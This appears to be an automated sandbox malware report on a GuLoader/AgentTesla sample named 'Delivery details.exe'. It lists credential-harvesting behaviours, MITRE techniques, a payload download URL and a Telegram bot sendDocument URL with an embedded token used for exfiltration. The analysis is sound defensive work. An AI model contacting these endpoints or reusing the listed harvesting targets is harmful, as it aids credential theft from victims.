Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Delivery details.exe

0_2_00403489

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000006.00000002.3279914953.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 4400, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 4400, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000006.00000002.3279914953.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 4400, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000006.00000002.3279914953.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 4400, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 4400, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	11 Input Capture	26 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	111 Process Injection	1 Obfuscated Files or Information	1 Credentials in Registry	321 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	11 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	251 Virtualization/Sandbox Evasion	SSH	2 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	251 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Delivery details.exe	14%	Virustotal		Browse
Delivery details.exe	13%	ReversingLabs	Win32.Trojan.Guloader

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exe	13%	ReversingLabs	Win32.Trojan.Guloader
C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exe	14%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
mzu7.sa.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://mzu7.sa.com/AqtYsvzFN55.bin2C	0%	Avira URL Cloud	safe
https://mzu7.sa.com/AqtYsvzFN55.bin	0%	Avira URL Cloud	safe
https://mzu7.sa.com/	0%	Avira URL Cloud	safe
https://mzu7.sa.com/AqtYsvzFN55.bin	0%	Virustotal		Browse
https://mzu7.sa.com/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mzu7.sa.com	162.240.109.7	true	false	0%, Virustotal, Browse	unknown
api.ipify.org	104.26.13.205	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/sendDocument	false		high
https://mzu7.sa.com/AqtYsvzFN55.bin	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org	wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot6387496510:AAGzkvOV3EOvSZjPNfclsVSKq_tcdKpU-7o/	wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mzu7.sa.com/AqtYsvzFN55.bin2C	wab.exe, 00000006.00000002.3268060229.0000000005993000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Delivery details.exe, Delivery details.exe.2.dr	false		high
https://api.telegram.org	wab.exe, 00000006.00000002.3279914953.00000000213A0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.00000000213D3000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021427000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org/t	wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	wab.exe, 00000006.00000002.3279914953.00000000213A0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.00000000213D3000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.000000002146B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3279914953.0000000021215000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mzu7.sa.com/	wab.exe, 00000006.00000002.3268060229.0000000005993000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	wab.exe, 00000006.00000002.3279914953.00000000211A1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
162.240.109.7	mzu7.sa.com	United States	46606	UNIFIEDLAYER-AS-1US	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1409546
Start date and time:	2024-03-15 12:35:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Delivery details.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/15@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 53 Number of non-executed functions: 26
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target wab.exe, PID 4400 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:35:56	API Interceptor	43x Sleep call for process: powershell.exe modified
12:36:32	API Interceptor	713684x Sleep call for process: wab.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	FedEx Shipping Document.exe	Get hash	malicious	AgentTesla	Browse
	1C24TGL_00000531.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	1C24TGL_00000531.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	1C24TTC_00000020.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	MT103_VPB202403150000003392.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Delivery Information.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	2257HVL2300001691.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	E4sbo4F6Sz.exe	Get hash	malicious	Unknown	Browse
	E4sbo4F6Sz.exe	Get hash	malicious	Unknown	Browse
	o03y1GwhRQ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
162.240.109.7	SALARY_RECEIPT.exe	Get hash	malicious	GuLoader	Browse
	Delivery note.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	2257HVL2300001691.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Admin_review.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
104.26.13.205	E4sbo4F6Sz.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	E4sbo4F6Sz.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.RATX-gen.31127.4101.exe	Get hash	malicious	PureLog Stealer, Targeted Ransomware	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	PO1082N0297.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	PO1876.xls	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	VAN3065008.xls	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	FedEx Shipping Document.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	DHL AWB 00542011 PDF.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Salary_receipt.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	rVOLMI-008-24SG.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	rFATURA2024-001.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	PUK ITALIA PO 120610549.EXE.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
mzu7.sa.com	SALARY_RECEIPT.exe	Get hash	malicious	GuLoader	Browse	162.240.109.7
	Delivery note.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	162.240.109.7
	2257HVL2300001691.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	162.240.109.7
	Admin_review.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	162.240.109.7
api.telegram.org	FedEx Shipping Document.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	1C24TGL_00000531.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	1C24TGL_00000531.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	1C24TTC_00000020.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	MT103_VPB202403150000003392.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	Delivery Information.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	2257HVL2300001691.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	E4sbo4F6Sz.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	E4sbo4F6Sz.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	o03y1GwhRQ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	FedEx Shipping Document.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	1C24TGL_00000531.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	1C24TGL_00000531.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	1C24TTC_00000020.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	MT103_VPB202403150000003392.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	Delivery Information.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	2257HVL2300001691.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	E4sbo4F6Sz.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	E4sbo4F6Sz.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	o03y1GwhRQ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
CLOUDFLARENETUS	SecuriteInfo.com.ELF.Mirai-AJJ.29298.29842.elf	Get hash	malicious	Mirai	Browse	172.64.148.116
	https://google.co.za/amp/kirikkaledemasaj.xyz/Ho3GG/sHiTcmFkb3NsYXcubWF6dXJAa2dobS5jb20=	Get hash	malicious	Captcha Phish	Browse	172.67.183.186
	SecuriteInfo.com.Trojan.Linux.Mirai.16314.15376.elf	Get hash	malicious	Mirai	Browse	104.22.78.248
	https://mkmkti.indiaawsdna.equipment/rxzt/mardz/z/#?service=ZGlhbmUubWFsYm9ldWZAY2dpLmNvbSZkZGMmYw==	Get hash	malicious	Unknown	Browse	104.17.2.184
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, RisePro Stealer	Browse	172.67.196.214
	PO1082N0297.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	RECH31683168.lnk	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.1.231
	https://cloudflare-ipfs.com/ipfs/bafkreiggxtldaangicvpjo2q6jvkm4yftayolo7yjc4gqxymzo5tjdvfum?filename=Inbox.html#flikkerop@eur.nl	Get hash	malicious	HTMLPhisher	Browse	172.67.139.119
	https://www.google.com/url?rct=j&sa=t&url=https://taideroy.shop/xgenorjrcfbyccd&ct=ga&cd=CAEYACoTOTM4MjY0NjY4MTMxODkwNDQ4MjIaNzk5OWIzOWI5OWZlNDY2OTpjb206ZW46VVM&usg=AOvVaw3oBYO9ct6U-nJjUu73iXVu	Get hash	malicious	Unknown	Browse	172.67.182.158
	https://www.thestarnewstoday.com/	Get hash	malicious	Unknown	Browse	104.26.15.166
UNIFIEDLAYER-AS-1US	SALARY_RECEIPT.exe	Get hash	malicious	GuLoader	Browse	162.240.109.7
	https://t.uk.nespresso.com/r/?id=h859505ee,590c6122,56f60c49&p1=klask%E3%80%82co.uk/css#7509Y2xhcmEuZGliZXJuYXJkb0BrZWxsZXJoYWxzLWNhcnJhcmQuY2g=??FAXAGFAXAG=Y2xhcmEuZGliZXJuYXJkb0BrZWxsZXJoYWxzLWNhcnJhcmQuY2g=/..=IDQGDYCA&u=276b8dda4ef94158348d5b6b8&id=6b7205781d	Get hash	malicious	Fake Captcha	Browse	192.185.75.165
	logo trademark license agreement 97698.js	Get hash	malicious	Unknown	Browse	162.241.248.20
	https://google.co.za/amp/s/smsfrica.com/g004k/ZnJhbmNvaXMuamFjcXVlc0Bhc3NuYXQucWMuY2E=	Get hash	malicious	Unknown	Browse	192.185.112.107
	http://zerpcon.com/nxgtnrtn/imgsdoll	Get hash	malicious	Unknown	Browse	162.241.114.35
	https://solartechnology.com/	Get hash	malicious	Unknown	Browse	108.179.228.32
	http://zerpcon.com	Get hash	malicious	Unknown	Browse	162.241.114.35
	https://brandequity.economictimes.indiatimes.com/etl.php?url=conocepuertorico.com/JEEZ/FANTOO/2ALwh1DTJi/ZmphY29ic29uQHJvc2VueWMuY29t	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	69.49.228.234
	https://brandequity.economictimes.indiatimes.com/etl.php?url=//zerpcon.com/nxgtnrtn/imgsdoll#a2VuZHJhLmdvdWRyZWF1QGdsb2JhbGZvdW5kcmllcy5jb20=	Get hash	malicious	Unknown	Browse	162.241.114.35
	PUK ITALIA PO 120610549.EXE.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.254.186.165

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	PO1082N0297.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 104.26.13.205
	RECH31683168.lnk	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	149.154.167.220 104.26.13.205
	AvVRnJAfRJ.exe	Get hash	malicious	Quasar	Browse	149.154.167.220 104.26.13.205
	logo trademark license agreement 97698.js	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
	logo trademark license agreement 97698.js	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 104.26.13.205
	FedEx Shipping Document.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 104.26.13.205
	DHL AWB 00542011 PDF.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 104.26.13.205
	1C24MYC_00225253.pdf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
	1C24MYC_00225253.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
37f463bf4616ecd445d4a1937da06e19	Patch_MB_5.x.exe	Get hash	malicious	Unknown	Browse	162.240.109.7
	RDPWInst-v1.6.2.msi	Get hash	malicious	Unknown	Browse	162.240.109.7
	vGPoWZM3lZ.exe	Get hash	malicious	Amadey	Browse	162.240.109.7
	Salary_receipt.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	162.240.109.7
	rVOLMI-008-24SG.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	162.240.109.7
	Details And Invoices.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	162.240.109.7
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	162.240.109.7
	1320743.lnk	Get hash	malicious	Unknown	Browse	162.240.109.7
	Salary_receipt.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	162.240.109.7
	Scanned Purchase Copy.vbs	Get hash	malicious	FormBook, GuLoader	Browse	162.240.109.7

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.838950934453595
Encrypted:	false
SSDEEP:	192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
MD5:	4C24412D4F060F4632C0BD68CC9ECB54
SHA1:	3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
SHA-256:	411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
SHA-512:	6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4ruvxfh.hvl.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syd1s2il.wy3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
